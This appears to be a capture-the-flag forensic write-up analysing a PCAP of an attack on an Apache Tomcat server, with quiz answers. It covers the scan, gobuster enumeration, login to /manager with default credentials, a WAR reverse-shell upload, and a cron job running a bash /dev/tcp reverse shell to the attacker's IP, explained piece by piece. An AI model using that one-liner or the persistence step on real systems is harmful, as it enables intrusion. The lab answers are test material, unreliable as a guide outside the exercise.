Tomcat Takeover

Scenario

The SOC team has identified suspicious activity on one of the company’s web servers, prompting an investigation into the potential compromise. A PCAP file containing network traffic data has been captured to assist in analyzing the intrusion. The investigation revealed a series of scanning attempts, followed by directory enumeration and brute-force login attempts on the Apache Tomcat web server’s administrative interface.

Incident Walkthrough

Before conducting any investigation, we need to gather information first. Since we have a PCAP file, we can use Wireshark to analyze it by checking the Protocol Hierarchy and Conversations

Protocol Hierarchy

Conversations

We can observe a significant amount of TCP traffic across various ports, which could indicate port scanning. Additionally, if port scanning is occurring, it usually involves numerous packets. The IP address 14.0.0.120 shows a particularly high number of packets, which supports this suspicion so let's check this IP.

Port Scan

Indeed, this IP address is actively performing a port scan.

1- Given the suspicious activity detected on the web server, the pcap analysis shows a series of requests across various ports, suggesting a potential scanning behavior. Can you identify the source IP address responsible for initiating these requests on our server?

Answer: 14.0.0.120

To determine how many ports it has discovered, we can use the following query:

tcp.flags.ack==1  && tcp.flags.syn==1 &&ip.addr==14.0.0.120

Open Ports

It has discovered three open ports:

1. Port 22 – SSH

2. Port 8009 – AJP (Apache AJP Proxy)

3. Port 8080 – Alternative HTTP port

According to Google, Tomcat typically uses:

After identifying the IP address, we need to determine the origin of the attack. We can use a website called: iplocation

IP Location

2- Based on the identified IP address associated with the attacker, can you ascertain the city from which the attacker's activities originated?  

Answer: Guangzhou

After identifying the attacker's IP and the ports, we need to track their activity on the ports discovered during the scan. The attacker has initiated communication with port 8080.

URI Brute-Forcing

We can observe that the attacker has started using gobuster a tool for brute-forcing URIs (directories and files) on web servers, as well as DNS subdomains and virtual hosts.

4- Following the discovery of open ports on our server, it appears that the attacker attempted to enumerate and uncover directories and files on our web server. Which tools can you identify from the analysis that assisted the attacker in this enumeration process?

Answer: gobuster

401 Unauthorized

401 Unauthorized

We can see that the attacker encountered a 401 Unauthorized error, indicating that they need privileges to access this page.

3- From the pcap analysis, multiple open ports were detected as a result of the attacker's activitie scan. Which of these ports provides access to the web server admin panel?

Answer: 8080

5- Subsequent to their efforts to enumerate directories on our web server, the attacker made numerous requests trying to identify administrative interfaces. Which specific directory associated with the admin panel was the attacker able to uncover?

Answer: /manager

Once the attacker identified the admin panel, they began performing a brute force attack. Unfortunately, the server was using default credentials.

Credentials Used

Default Credentials

6- Upon accessing the admin panel, the attacker made attempts to brute-force the login credentials. From the data, can you identify the correct username and password combination that the attacker successfully used for authorization?

Answer: admin:tomcat

After accessing the admin panel, the attacker downloaded a file named JXQOZY.war.

File Upload

7- Once inside the admin panel, the attacker attempted to upload a file with the intent of establishing a reverse shell. Can you identify the name of this malicious file from the captured data?

Answer: JXQOZY.war

Adding a Cron Job

The file turned out to be a reverse shell, and the attacker executed commands such as whoami, cd, and pwd. Notably, they added a cron job using crontab.

crontab is a command used to schedule tasks in Unix-like operating systems, and these tasks are known as cron jobs. The cron job is set to run every minute (* * * * *) and executes a reverse shell command:

echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'" > cron

• /bin/bash -c: Executes a command.

  • 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1': Establishes a reverse shell connection to the IP 14.0.0.120 on port 443.

    • bash -i: Starts an interactive bash shell.

    • >& /dev/tcp/14.0.0.120/443: Redirects both stdout (>&) and stderr to the target IP and port.

    • 0>&1: Redirects stdin from the same connection.

• crontab -i cron: Installs the cron job from the file cron. The -i option prompts for confirmation before overwriting an existing crontab.

• crontab -l: Lists the active cron jobs, confirming that the reverse shell job has been successfully installed.

8- Upon successfully establishing a reverse shell on our server, the attacker aimed to ensure persistence on the compromised machine. From the analysis, can you determine the specific command they are scheduled to run to maintain their presence?

Answer: /bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'

I hope you enjoyed :)